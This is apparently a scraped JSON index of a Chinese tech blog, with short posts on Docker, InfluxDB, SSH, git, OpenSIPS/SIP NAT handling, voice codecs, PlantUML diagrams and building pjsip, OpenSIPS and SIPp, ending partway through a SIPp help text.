想想哪些没有docker时光, 我们是怎么玩linux的。\n首先你要先装一个vmware或者virtualbox, 然后再下载一个几个GB的ISO文件,然后一步两步三步的经过十几个步骤,终于装好了一个虚拟机。这其中的步骤,每一步都可能有几个坑在等你踩。\n六年前,也就是在2013的时候,docker出现了,这个新奇的东西,可以让你用一行命令运行一个各种linux的发行版。\ndocker run -it centos docker run -it debian 黑色裂变:docker时代 docker 官网上,有个对docker非常准确的定位:\nDocker: The Modern Platform for High-Velocity Innovation\n我觉得行英文很好理解,但是不好翻译,从中抽取三个一个最终要的关键词。\u0026ldquo;High-Velocty\u0026rdquo;,可以理解为加速,提速。\n那么docker让devops提速了多少呢?\n没有docker的时代,如果可以称为冷兵器时代的话,docker的出现,将devops带入了热兵器时代。\n我们不用再准备石头,木棍,不需要打磨兵器,我们唯一要做的事情,瞄准目标,扣动扳机。\n运筹帷幄:k8s时代 说实在的,我还没仔细去体味docker的时代时,就已经进入了k8s时代。k8s的出现,让我们可以不用管docker, 可以直接跳过docker, 直接学习k8s的概念与命令。\nk8s的好处就不再多少了,只说说它的缺点。\n资源消耗大:k8s单机版没什么意义,一般都是集群,你需要多台虚拟机 部署耗费精力:想要部署k8s,要部署几个配套的基础服务 k8s对于tcp服务支持很好,对于udp服务, 所以如果我们仅仅是需要一个环境,跑跑自己的代码,相比于k8s,docker无疑是最方便且便宜的选择。\n说实在的,我之前一直对docker没有全面的掌握,系统的学习,我将会在这个知识库里,系统的梳理docker相关的知识和实战经验。\n帝国烽烟:云原生时代 微服务 应用编排调度 容器化 面向API 参考 https://en.wikipedia.org/wiki/Docker,_Inc. https://thenewstack.io/10-key-attributes-of-cloud-native-applications/ https://jimmysong.io/kubernetes-handbook/cloud-native/cloud-native-definition.html https://www.redhat.com/en/topics/cloud-native-apps ","title":"虚拟化浪潮"},{"content":"创建数据库 curl -i -XPOST http://localhost:8086/query --data-urlencode \u0026#34;q=CREATE DATABASE testdb\u0026#34; 写数据到数据库 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary \u0026#39;cpu_load_short,host=server01,region=us-west value=0.64 1434055562000000000\u0026#39; 批量写入 output.txt\nnginx_second,tag=ip169 value=21 1592638800000000000 nginx_second,tag=ip169 value=32 1592638801000000000 nginx_second,tag=ip169 value=20 1592638802000000000 nginx_second,tag=ip169 value=11 1592638803000000000 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary @output.txt 参考 https://docs.influxdata.com/influxdb/v1.7/guides/writing_data/ ","permalink":"https://wdd.js.org/posts/2019/10/eqgykt/","summary":"创建数据库 curl -i -XPOST http://localhost:8086/query --data-urlencode \u0026#34;q=CREATE DATABASE testdb\u0026#34; 写数据到数据库 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary \u0026#39;cpu_load_short,host=server01,region=us-west value=0.64 1434055562000000000\u0026#39; 批量写入 output.txt\nnginx_second,tag=ip169 value=21 1592638800000000000 nginx_second,tag=ip169 value=32 1592638801000000000 nginx_second,tag=ip169 value=20 1592638802000000000 nginx_second,tag=ip169 value=11 1592638803000000000 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary @output.txt 参考 https://docs.influxdata.com/influxdb/v1.7/guides/writing_data/ ","title":"influxdb http操作"},{"content":"编辑这个文件 ~/.ssh/config 在顶部添加下边两行 Host * ServerAliveInterval=30 每隔30秒向服务端发送 no-op包\n","permalink":"https://wdd.js.org/posts/2019/10/swoxa5/","summary":"编辑这个文件 ~/.ssh/config 在顶部添加下边两行 Host * ServerAliveInterval=30 每隔30秒向服务端发送 no-op包","title":"ssh保持连接状态不断开"},{"content":"Notify 使用noify消息,通知分机应答,这个notify一般发送在分机回180响应之后\nAnswer-mode Answer-Mode一般有两个值 Auto: UA收到INVITE之后,立即回200OK,没有180的过程 Manual: UA收到INVITE之后,等待用户手工点击应答 通常Answer-Mode还会跟着require, 表示某个应答方式如果不被允许,应当回403 Forbidden 作为响应。\nAnswer-Mode: Auto;require 和Answer-mode头类似的有个SIP头叫做:Priv-Answer-Mode,这个功能和Answer-Mode类似,但是他有个特点。\n如果UA设置了免打扰,Priv-Answer-Mode头会无视免打扰这个选项,强制让分机应答,这个头适合用于紧急呼叫。\n结论 如果要实现分机的自动应答,显然Answer-Mode的应答速度回更快。但是对于依赖180响应的系统,可能要考虑这种没有180相应的情况。\n要记住,在SIP消息里,对于UA来说,1xx的响应都是不必须的可以缺少的。\n","permalink":"https://wdd.js.org/opensips/ch1/ua-answer-mode/","summary":"Notify 使用noify消息,通知分机应答,这个notify一般发送在分机回180响应之后\nAnswer-mode Answer-Mode一般有两个值 Auto: UA收到INVITE之后,立即回200OK,没有180的过程 Manual: UA收到INVITE之后,等待用户手工点击应答 通常Answer-Mode还会跟着require, 表示某个应答方式如果不被允许,应当回403 Forbidden 作为响应。\nAnswer-Mode: Auto;require 和Answer-mode头类似的有个SIP头叫做:Priv-Answer-Mode,这个功能和Answer-Mode类似,但是他有个特点。\n如果UA设置了免打扰,Priv-Answer-Mode头会无视免打扰这个选项,强制让分机应答,这个头适合用于紧急呼叫。\n结论 如果要实现分机的自动应答,显然Answer-Mode的应答速度回更快。但是对于依赖180响应的系统,可能要考虑这种没有180相应的情况。\n要记住,在SIP消息里,对于UA来说,1xx的响应都是不必须的可以缺少的。","title":"UA应答模式的实现"},{"content":"前些天,有朋友推荐一部美剧《致命女人》,听着名字,觉得有点像特工或者犯罪系列的电视剧。\n看了前第一集之后,才发现这个剧是讲述关于婚姻方面问题美剧。\n一般情况下,我不喜欢看婚姻题材的影视。但是,任何事情都逃不过真相定律。\n","permalink":"https://wdd.js.org/posts/2019/09/zgwg91/","summary":"前些天,有朋友推荐一部美剧《致命女人》,听着名字,觉得有点像特工或者犯罪系列的电视剧。\n看了前第一集之后,才发现这个剧是讲述关于婚姻方面问题美剧。\n一般情况下,我不喜欢看婚姻题材的影视。但是,任何事情都逃不过真相定律。","title":"致命女人 Why Women Kill"},{"content":"git clean -n # 打印哪些文件将会被删除 git clean -f # 删除文件 git clean -fd # 删除文件个目录 参考 https://stackoverflow.com/questions/61212/how-to-remove-local-untracked-files-from-the-current-git-working-tree ","permalink":"https://wdd.js.org/posts/2019/09/vccx09/","summary":"git clean -n # 打印哪些文件将会被删除 git clean -f # 删除文件 git clean -fd # 删除文件个目录 参考 https://stackoverflow.com/questions/61212/how-to-remove-local-untracked-files-from-the-current-git-working-tree ","title":"git 删除未跟踪的文件"},{"content":"构造json $json(body) := \u0026#34;{}\u0026#34;; $json(body/time) = $time(%F %T-0300); $json(body/sipRequest) = “INVITE”; $json(body/ipIntruder) = $si; $json(body/destNum) = $rU; $json(body/userAgent) = $ua; $json(body/country)=$var(city); $json(body/location)=$var(latlon); $json(body/ipHost) = $Ri; 使用async rest_post写数据 async好像存在于2.1版本及其以上, 异步的好处是不会阻止脚本的继续执行 async(rest_post(\u0026#34;http://user:password@w.x.y.z:9200/opensips/1\u0026#34;, \u0026#34;$json(body)\u0026#34;, \u0026#34;$var(ctype)\u0026#34;, \u0026#34;$var(ct)\u0026#34;, \u0026#34;$var(rcode)\u0026#34;),resume) ","permalink":"https://wdd.js.org/opensips/ch3/elk/","summary":"构造json $json(body) := \u0026#34;{}\u0026#34;; $json(body/time) = $time(%F %T-0300); $json(body/sipRequest) = “INVITE”; $json(body/ipIntruder) = $si; $json(body/destNum) = $rU; $json(body/userAgent) = $ua; $json(body/country)=$var(city); $json(body/location)=$var(latlon); $json(body/ipHost) = $Ri; 使用async rest_post写数据 async好像存在于2.1版本及其以上, 异步的好处是不会阻止脚本的继续执行 async(rest_post(\u0026#34;http://user:password@w.x.y.z:9200/opensips/1\u0026#34;, \u0026#34;$json(body)\u0026#34;, \u0026#34;$var(ctype)\u0026#34;, \u0026#34;$var(ct)\u0026#34;, \u0026#34;$var(rcode)\u0026#34;),resume) ","title":"opensips日志写入elasticsearch"},{"content":" https://smallpdf.com https://www.pdfpai.com/pdf-to-powerpoint ","permalink":"https://wdd.js.org/posts/2019/09/wn0a02/","summary":" https://smallpdf.com https://www.pdfpai.com/pdf-to-powerpoint ","title":"pdf转ppt工具收集"},{"content":"特点分析 回铃音有以下特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 常见问题 听不到回铃音 【现象】打同一个号码,有些手机能听到回铃音,有些手机听不到回铃音【排查思路】\n有些手机volte开启后,可能会导致无回铃音,所以可以关闭volte试试 被叫的运营商,主叫手机的运营商 参考资料 https://zh.wikipedia.org/wiki/%E5%9B%9E%E9%93%83%E9%9F%B3 https://baike.baidu.com/item/%E5%9B%9E%E9%93%83%E9%9F%B3/1014322 http://www.it9000.cn/tech/CTI/signal.html ","permalink":"https://wdd.js.org/opensips/ch2/early-media/","summary":"特点分析 回铃音有以下特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 常见问题 听不到回铃音 【现象】打同一个号码,有些手机能听到回铃音,有些手机听不到回铃音【排查思路】\n有些手机volte开启后,可能会导致无回铃音,所以可以关闭volte试试 被叫的运营商,主叫手机的运营商 参考资料 https://zh.wikipedia.org/wiki/%E5%9B%9E%E9%93%83%E9%9F%B3 https://baike.baidu.com/item/%E5%9B%9E%E9%93%83%E9%9F%B3/1014322 http://www.it9000.cn/tech/CTI/signal.html ","title":"回铃音"},{"content":"几种常用电话信号音的含义 信号频率:(450±25)HZ:拨号音、回铃音、忙音、长途通知音、空号音(950±25)HZ:催挂音\n拨号音 摘机后受话器中便有一种“嗡\u0026ndash;”的连续音,这种声音就是拨号音,它表示自动交换机或对方呼叫中心系统已经做好了接续准备,允许用户拨号\n回铃音 拨完被叫号,若听到“嘟\u0026ndash;嘟\u0026ndash;”的断续音(响1s,断4s),便是回铃音,表示被叫话机正在响铃,可静候接话;如果振铃超过10余次,仍无人讲话,说明对方无人接电话,应放好手柄稍后再拨。\n忙音 当主叫用户在拨号过程中或拨完被叫电话号码后,若听到“嘟、嘟、嘟……”的短促音(响0.35s,断0.35s),这就是忙音,表示线路已经被占满或被叫电话机正在使用\n长途通知音 当主叫用户和被叫用户正在进行市内通话时,听到“嘟、嘟、嘟……”的短促音(响0.2s,断0.2s,响0.2s,间歇0.6s),这便是长途电话通知音,表示有长途电话插入,提醒主被叫用户双方尽快结束市内通话,准备接听长途电话。\n空号音 当用户拨完号码后听到不等间隔断续信号音(重复3次0.1s响,0.1s断后,0.4s响0.4s断),这便是空号音,表示通知主叫用户所呼叫的被叫号码为空号或受限制的号码。\n催挂音 如果用户听到连续信号音,响度变化为5级,由低级逐步升高,则是催挂音。通知久不挂机的用户迅速挂机。\n参考 http://www.it9000.cn/tech/CTI/signal.html ","permalink":"https://wdd.js.org/opensips/ch2/early-media-type/","summary":"几种常用电话信号音的含义 信号频率:(450±25)HZ:拨号音、回铃音、忙音、长途通知音、空号音(950±25)HZ:催挂音\n拨号音 摘机后受话器中便有一种“嗡\u0026ndash;”的连续音,这种声音就是拨号音,它表示自动交换机或对方呼叫中心系统已经做好了接续准备,允许用户拨号\n回铃音 拨完被叫号,若听到“嘟\u0026ndash;嘟\u0026ndash;”的断续音(响1s,断4s),便是回铃音,表示被叫话机正在响铃,可静候接话;如果振铃超过10余次,仍无人讲话,说明对方无人接电话,应放好手柄稍后再拨。\n忙音 当主叫用户在拨号过程中或拨完被叫电话号码后,若听到“嘟、嘟、嘟……”的短促音(响0.35s,断0.35s),这就是忙音,表示线路已经被占满或被叫电话机正在使用\n长途通知音 当主叫用户和被叫用户正在进行市内通话时,听到“嘟、嘟、嘟……”的短促音(响0.2s,断0.2s,响0.2s,间歇0.6s),这便是长途电话通知音,表示有长途电话插入,提醒主被叫用户双方尽快结束市内通话,准备接听长途电话。\n空号音 当用户拨完号码后听到不等间隔断续信号音(重复3次0.1s响,0.1s断后,0.4s响0.4s断),这便是空号音,表示通知主叫用户所呼叫的被叫号码为空号或受限制的号码。\n催挂音 如果用户听到连续信号音,响度变化为5级,由低级逐步升高,则是催挂音。通知久不挂机的用户迅速挂机。\n参考 http://www.it9000.cn/tech/CTI/signal.html ","title":"几种常用电话信号音的含义"},{"content":"问题描述 连接服务器时的报警\n-bash: 警告:setlocale: LC_CTYPE: 无法改变区域选项 (UTF-8): 没有那个文件或目录 git status 发现本来应该显示 \u0026lsquo;on brance master\u0026rsquo; 之类的地方,居然英文也乱码了,都是问号。\n解决方案 vim /etc/environment , 然后加入如下代码,然后重新打开ssh窗口\nLC_ALL=en_US.UTF-8 LANG=en_US.UTF-8 ","permalink":"https://wdd.js.org/posts/2019/09/msx8i9/","summary":"问题描述 连接服务器时的报警\n-bash: 警告:setlocale: LC_CTYPE: 无法改变区域选项 (UTF-8): 没有那个文件或目录 git status 发现本来应该显示 \u0026lsquo;on brance master\u0026rsquo; 之类的地方,居然英文也乱码了,都是问号。\n解决方案 vim /etc/environment , 然后加入如下代码,然后重新打开ssh窗口\nLC_ALL=en_US.UTF-8 LANG=en_US.UTF-8 ","title":"Royal TSX git status 输出乱码"},{"content":"git config --global --unset http.proxy ","permalink":"https://wdd.js.org/posts/2019/09/yko32n/","summary":"git config --global --unset http.proxy ","title":"git取消设置http代理"},{"content":"解决信令的过程 NAT检测 使用rport解决Via 在初始化请求和响应中修改Contact头 处理来自NAT内部的注册请求 Ping客户端使NAT映射保持打开 处理序列化请求 实现NAT检测 nat_uac_test 使用函数 nat_uac_test\n1 搜索Contact头存在于RFC 1918 中的地址 2 检测Via头中的received参数和源地址是否相同 4 最顶部的Via出现在RFC1918 / RFC6598地址中 8 搜索SDP头出现RFC1918 / RFC6598地址 16 测试源端口是否和Via头中的端口不同 32 比较Contact中的地址和源信令的地址 64 比较Contact中的端口和源信令的端口 上边的测试都是可以组合的,并且任何一个测试通过,则返回true。\n例如下面的测试19,实际上是1+2+16三项测试的组合\nnat_uac_test(\u0026#34;19\u0026#34;) 使用rport和receive参数标记Via头 从NAT内部出去的呼叫,往往可能不知道自己的出口IP和端口,只有远端的SIP服务器收到请求后,才能知道UAC的真是出口IP和端口。出口IP用received=x.x.x.x,出口端口用rport=xx。当有消息发到UAC时,应当发到received和rport所指定的地址和端口。\n# 原始的Via Via: SIP/2.0/UDP 192.168.4.48:5062;branch=z9hG4bK523223793;rport # 经过opensips处理后的Via Via: SIP/2.0/UDP 192.168.4.48:5062;received=192.168.4.48;branch=z9hG4bK523223793;rport=5062 修复Contact头 Via头和Contact头是比较容易混淆的概念,但是两者的功能完全不同。Via头使用来导航183和200响应应该如何按照原路返回。Contact用来给序列化请求,例如BYE和UPDATE导航。如果Contact头不正确,可能会导致呼叫无法挂断。那么就需要用fix_nated_contact()函数去修复Contact头。另外,对于183和200的响应也需要去修复Contact头。\n处理注册请求 RFC 1918 地址组 10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) 参考 http://www.rfcreader.com/#rfc1918 ","permalink":"https://wdd.js.org/opensips/ch1/fix-nat/","summary":"解决信令的过程 NAT检测 使用rport解决Via 在初始化请求和响应中修改Contact头 处理来自NAT内部的注册请求 Ping客户端使NAT映射保持打开 处理序列化请求 实现NAT检测 nat_uac_test 使用函数 nat_uac_test\n1 搜索Contact头存在于RFC 1918 中的地址 2 检测Via头中的received参数和源地址是否相同 4 最顶部的Via出现在RFC1918 / RFC6598地址中 8 搜索SDP头出现RFC1918 / RFC6598地址 16 测试源端口是否和Via头中的端口不同 32 比较Contact中的地址和源信令的地址 64 比较Contact中的端口和源信令的端口 上边的测试都是可以组合的,并且任何一个测试通过,则返回true。\n例如下面的测试19,实际上是1+2+16三项测试的组合\nnat_uac_test(\u0026#34;19\u0026#34;) 使用rport和receive参数标记Via头 从NAT内部出去的呼叫,往往可能不知道自己的出口IP和端口,只有远端的SIP服务器收到请求后,才能知道UAC的真是出口IP和端口。出口IP用received=x.x.x.x,出口端口用rport=xx。当有消息发到UAC时,应当发到received和rport所指定的地址和端口。\n# 原始的Via Via: SIP/2.0/UDP 192.168.4.48:5062;branch=z9hG4bK523223793;rport # 经过opensips处理后的Via Via: SIP/2.0/UDP 192.168.4.48:5062;received=192.168.4.48;branch=z9hG4bK523223793;rport=5062 修复Contact头 Via头和Contact头是比较容易混淆的概念,但是两者的功能完全不同。Via头使用来导航183和200响应应该如何按照原路返回。Contact用来给序列化请求,例如BYE和UPDATE导航。如果Contact头不正确,可能会导致呼叫无法挂断。那么就需要用fix_nated_contact()函数去修复Contact头。另外,对于183和200的响应也需要去修复Contact头。\n处理注册请求 RFC 1918 地址组 10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) 参考 http://www.rfcreader.com/#rfc1918 ","title":"NAT解决方法"},{"content":" 编码 带宽 MOS 环境 特点 说明 G.711 64 kbps 4.45 LAN/WAN 语音质量高,适合对接网关 G.711实际上就是PCM, 是最基本的编码方式。PCM又分为两类PCMA(g711a), PCMU(g711u)。中国使用的是PCMA G.729 8 kbps 4.04 WAN 带宽占用率很小,同时能保证不错的语音质量 分为G729a和G729b两种,G729之所以带宽占用是G711的1/8, 是因为G729的压缩算法不同。G729传输的不是真正的语音,而是语音压缩后的结果。G729的编解码是由专利的,也就说不免费。 G.722 64 kbps 4.5 LAN 语音质量高 HD hd语音 GSM 13.3 kbps 3.01 iLBA 13.3 15.2 抗丢包 OPUS 6-510 kbps - INTERNET OPUS的带宽范围跨度很广,适合语音和视屏 MOS值,Mean Opinion Score,用来定义语音质量。满分为5分,最低1分。\nMOS 质量 5 极好的 4 不错的 3 还行吧 2 中等差 1 最差 通常的打包是20ms一个包,那么一秒就会传输1000/20=50个包。如果采样评率是8000Hz, 那么每个包的会携带 8000/50=160个采样数据。在PCMA或者PCMU中,每个采样数据占用1字节。因此20ms的一个包就携带160字节的数据。\n在RTP包协议中,160字节还要加上12个自己的RTP头。 在fs上可以使用下面的命令查看fs支持的编码。\nshow codec ","permalink":"https://wdd.js.org/opensips/ch4/media-codec/","summary":" 编码 带宽 MOS 环境 特点 说明 G.711 64 kbps 4.45 LAN/WAN 语音质量高,适合对接网关 G.711实际上就是PCM, 是最基本的编码方式。PCM又分为两类PCMA(g711a), PCMU(g711u)。中国使用的是PCMA G.729 8 kbps 4.04 WAN 带宽占用率很小,同时能保证不错的语音质量 分为G729a和G729b两种,G729之所以带宽占用是G711的1/8, 是因为G729的压缩算法不同。G729传输的不是真正的语音,而是语音压缩后的结果。G729的编解码是由专利的,也就说不免费。 G.722 64 kbps 4.5 LAN 语音质量高 HD hd语音 GSM 13.3 kbps 3.01 iLBA 13.3 15.2 抗丢包 OPUS 6-510 kbps - INTERNET OPUS的带宽范围跨度很广,适合语音和视屏 MOS值,Mean Opinion Score,用来定义语音质量。满分为5分,最低1分。\nMOS 质量 5 极好的 4 不错的 3 还行吧 2 中等差 1 最差 通常的打包是20ms一个包,那么一秒就会传输1000/20=50个包。如果采样评率是8000Hz, 那么每个包的会携带 8000/50=160个采样数据。在PCMA或者PCMU中,每个采样数据占用1字节。因此20ms的一个包就携带160字节的数据。\n在RTP包协议中,160字节还要加上12个自己的RTP头。 在fs上可以使用下面的命令查看fs支持的编码。\nshow codec ","title":"常见媒体流编码及其特点"},{"content":"环境说明 centos7.6 docker 容器 过程 wget https://www.pjsip.org/release/2.9/pjproject-2.9.zip unzip pjproject-2.9.zip cd pjproject-2.9 chmod +x configure aconfigure yum install gcc gcc-c++ make -y make dep make make install yum install centos-release-scl yum install rh-python36 参考 https://www.pjsip.org/download.htm https://trac.pjsip.org/repos/wiki/Getting-Started https://trac.pjsip.org/repos/wiki/Getting-Started/Autoconf https://linuxize.com/post/how-to-install-python-3-on-centos-7/ ","permalink":"https://wdd.js.org/opensips/tools/pjsip/","summary":"环境说明 centos7.6 docker 容器 过程 wget https://www.pjsip.org/release/2.9/pjproject-2.9.zip unzip pjproject-2.9.zip cd pjproject-2.9 chmod +x configure aconfigure yum install gcc gcc-c++ make -y make dep make make install yum install centos-release-scl yum install rh-python36 参考 https://www.pjsip.org/download.htm https://trac.pjsip.org/repos/wiki/Getting-Started https://trac.pjsip.org/repos/wiki/Getting-Started/Autoconf https://linuxize.com/post/how-to-install-python-3-on-centos-7/ ","title":"pjsip"},{"content":"前端组件化时,有个很时髦的词语叫做关注点分离,这个用在组件上比较好,我们可以把大的模块分割成小的模块,降低了整个模块的复杂度。\n但是有时候,我觉得关注点分离并不好。这个不是指在代码开发过程,而是解决问题的过程。\n关注点分离的处理方式 假如我要解决问题A,但是在解决过程中,我发现了一个我不知道的东西B, 然后我就去研究这B是什么东西,然后接二连三,我从B一路找到了Z。\n然后在这个解决过程耽误一段时候后,才想起来:我之前是要解决什么问题来着??\n关注点集中的处理方式 不要再深究的路径上走的太深 在走其他路径时,也不要忘记最后要回到A点 ","permalink":"https://wdd.js.org/posts/2019/09/xi7kpf/","summary":"前端组件化时,有个很时髦的词语叫做关注点分离,这个用在组件上比较好,我们可以把大的模块分割成小的模块,降低了整个模块的复杂度。\n但是有时候,我觉得关注点分离并不好。这个不是指在代码开发过程,而是解决问题的过程。\n关注点分离的处理方式 假如我要解决问题A,但是在解决过程中,我发现了一个我不知道的东西B, 然后我就去研究这B是什么东西,然后接二连三,我从B一路找到了Z。\n然后在这个解决过程耽误一段时候后,才想起来:我之前是要解决什么问题来着??\n关注点集中的处理方式 不要再深究的路径上走的太深 在走其他路径时,也不要忘记最后要回到A点 ","title":"关注点分离的问题"},{"content":"web服务器如果是基于tcp的,那么用来监听端口端口例如80,一定只能用来接收消息,而不能从这个端口主动发消息出去。\n但是udp服务器就不一样了,同一端口,即可以用来做listen的端口,也可以从这个端口主动发消息出去。\n","permalink":"https://wdd.js.org/posts/2019/09/vc8oxs/","summary":"web服务器如果是基于tcp的,那么用来监听端口端口例如80,一定只能用来接收消息,而不能从这个端口主动发消息出去。\n但是udp服务器就不一样了,同一端口,即可以用来做listen的端口,也可以从这个端口主动发消息出去。","title":"TCP和UDP的区别畅想"},{"content":"我觉得PlantUML非常适合绘制时序图,先给个完整的例子,我经常会用到的PlantUML画SIP请求时序图。\n@startuml autonumber alice-\u0026gt;bob: INVITE bob-[#green]\u0026gt;alice: 180 Ringing bob-[#green]\u0026gt;alice: 200 OK == talking == bob-[#green]\u0026gt;alice: BYE alice-\u0026gt;bob: 200 OK @enduml 简单箭头 \u0026ndash;\u0026gt; 虚线箭头 -\u0026gt; 简单箭头 -[#red]\u0026gt; 带颜色的箭头 @startuml alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml 声明参与者顺序 先使用participant关键字声明了bob, 那么bob就会出现在最左边\n@startuml participant bob participant alice alice-\u0026gt;bob: INVITE bob-\u0026gt;alice: 180 Ringing @enduml 声明参与者类型 actor boundary control entity database @startuml participant start actor a boundary b control c entity d database e start-\u0026gt;a start-\u0026gt;b start-\u0026gt;c start-\u0026gt;d start-\u0026gt;e @enduml 箭头颜色 -[#red]\u0026gt; -[#0000ff]-\u0026gt; @startuml Bob -[#red]\u0026gt; Alice : hello Alice -[#0000FF]-\u0026gt;Bob : ok @enduml 箭头样式 @startuml Bob -\u0026gt;x Alice Bob -\u0026gt; Alice Bob -\u0026gt;\u0026gt; Alice Bob -\\ Alice Bob \\\\- Alice Bob //-- Alice Bob -\u0026gt;o Alice Bob o\\\\-- Alice Bob \u0026lt;-\u0026gt; Alice Bob \u0026lt;-\u0026gt;o Alice @enduml 箭头自动编号 设置autonumber\n@startuml autonumber alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml ","permalink":"https://wdd.js.org/posts/2019/09/hvscve/","summary":"我觉得PlantUML非常适合绘制时序图,先给个完整的例子,我经常会用到的PlantUML画SIP请求时序图。\n@startuml autonumber alice-\u0026gt;bob: INVITE bob-[#green]\u0026gt;alice: 180 Ringing bob-[#green]\u0026gt;alice: 200 OK == talking == bob-[#green]\u0026gt;alice: BYE alice-\u0026gt;bob: 200 OK @enduml 简单箭头 \u0026ndash;\u0026gt; 虚线箭头 -\u0026gt; 简单箭头 -[#red]\u0026gt; 带颜色的箭头 @startuml alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml 声明参与者顺序 先使用participant关键字声明了bob, 那么bob就会出现在最左边\n@startuml participant bob participant alice alice-\u0026gt;bob: INVITE bob-\u0026gt;alice: 180 Ringing @enduml 声明参与者类型 actor boundary control entity database @startuml participant start actor a boundary b control c entity d database e start-\u0026gt;a start-\u0026gt;b start-\u0026gt;c start-\u0026gt;d start-\u0026gt;e @enduml 箭头颜色 -[#red]\u0026gt; -[#0000ff]-\u0026gt; @startuml Bob -[#red]\u0026gt; Alice : hello Alice -[#0000FF]-\u0026gt;Bob : ok @enduml 箭头样式 @startuml Bob -\u0026gt;x Alice Bob -\u0026gt; Alice Bob -\u0026gt;\u0026gt; Alice Bob -\\ Alice Bob \\\\- Alice Bob //-- Alice Bob -\u0026gt;o Alice Bob o\\\\-- Alice Bob \u0026lt;-\u0026gt; Alice Bob \u0026lt;-\u0026gt;o Alice @enduml 箭头自动编号 设置autonumber","title":"PlantUML教程 包学包会"},{"content":"安装依赖 yum update \u0026amp;\u0026amp; yum install epel-release yum install openssl-devel mariadb-devel libmicrohttpd-devel \\ libcurl-devel libconfuse-devel ncurses-devel 编译 下面的脚本,默认将opensips安装在/usr/local/etc/目录下\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; 如果想要指定安装位置,可以使用prefix参数指定,例如指定安装在/usr/aaa目录\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch3/centos-install/","summary":"安装依赖 yum update \u0026amp;\u0026amp; yum install epel-release yum install openssl-devel mariadb-devel libmicrohttpd-devel \\ libcurl-devel libconfuse-devel ncurses-devel 编译 下面的脚本,默认将opensips安装在/usr/local/etc/目录下\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; 如果想要指定安装位置,可以使用prefix参数指定,例如指定安装在/usr/aaa目录\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; ","title":"centos7 安装opensips"},{"content":"安装 SIPp 3.3 # 解压 tar -zxvf sipp-3.3.990.tar.gz # centos 安装依赖 yum install lksctp-tools-devel libpcap-devel gcc-c++ gcc -y # ubuntu 安装以来 apt-get install -y pkg-config dh-autoreconf ncurses-dev build-essential libssl-dev libpcap-dev libncurses5-dev libsctp-dev lksctp-tools ./configure --with-sctp --with-pcap make \u0026amp;\u0026amp; make install sipp -v SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 6 2019, 20:12:17. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. 附件 sipp-3.3.990.tar.gz\n使用默认场景 uas sipp -sn uas -i 192.168.2.101 -sn 表示使用默认场景文件 uas 作为sip服务器 uac 作为sip客户端 -i 设置本地ip给Contact头 demo场景 sipp模拟sip服务器,当收到invite之后,先返回100,然后返回183,然后返回500\n首先我们将sipp内置的uas场景文件拿出来,基于这个场景文件做修改\n生成配置文件 sipp -sd uas \u0026gt; uas.xml 编辑配置文件\n启动uas\nsipp -sf uas.xml -i 192.168.40.77 -p 18627 -bg -skip_rlimit 帮助文档 Usage: sipp remote_host[:remote_port] [options] Available options: -v : Display version and copyright information. -aa : Enable automatic 200 OK answer for INFO, UPDATE and NOTIFY messages. -auth_uri : Force the value of the URI for authentication. By default, the URI is composed of remote_ip:remote_port. -au : Set authorization username for authentication challenges. Default is taken from -s argument -ap : Set the password for authentication challenges. Default is \u0026#39;password\u0026#39; -base_cseq : Start value of [cseq] for each call. -bg : Launch SIPp in background mode. -bind_local : Bind socket to local IP address, i.e. the local IP address is used as the source IP address. If SIPp runs in server mode it will only listen on the local IP address instead of all IP addresses. -buff_size : Set the send and receive buffer size. -calldebug_file : Set the name of the call debug file. -calldebug_overwrite: Overwrite the call debug file (default true). -cid_str : Call ID string (default %u-%p@%s). %u=call_number, %s=ip_address, %p=process_number, %%=% (in any order). -ci : Set the local control IP address -cp : Set the local control port number. Default is 8888. -d : Controls the length of calls. More precisely, this controls the duration of \u0026#39;pause\u0026#39; instructions in the scenario, if they do not have a \u0026#39;milliseconds\u0026#39; section. Default value is 0 and default unit is milliseconds. -deadcall_wait : How long the Call-ID and final status of calls should be 